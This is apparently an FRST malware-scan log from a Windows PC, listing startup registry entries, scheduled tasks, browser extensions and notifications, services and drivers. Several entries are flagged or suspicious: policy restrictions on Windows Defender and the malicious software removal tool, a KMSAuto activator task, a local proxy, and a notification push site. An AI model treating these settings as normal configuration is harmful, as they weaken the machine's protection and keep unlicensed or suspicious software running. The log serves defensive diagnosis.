==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11262019134949250\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.à r.l.)
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-26]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-25]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [No File]
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.p...tiateActivation[X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 HidGuardian; C:\Windows\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX™)
R3 L1C; C:\Windows\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [216544 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-11-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [278344 2019-11-26] (Malwarebytes Inc -> Malwarebytes)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
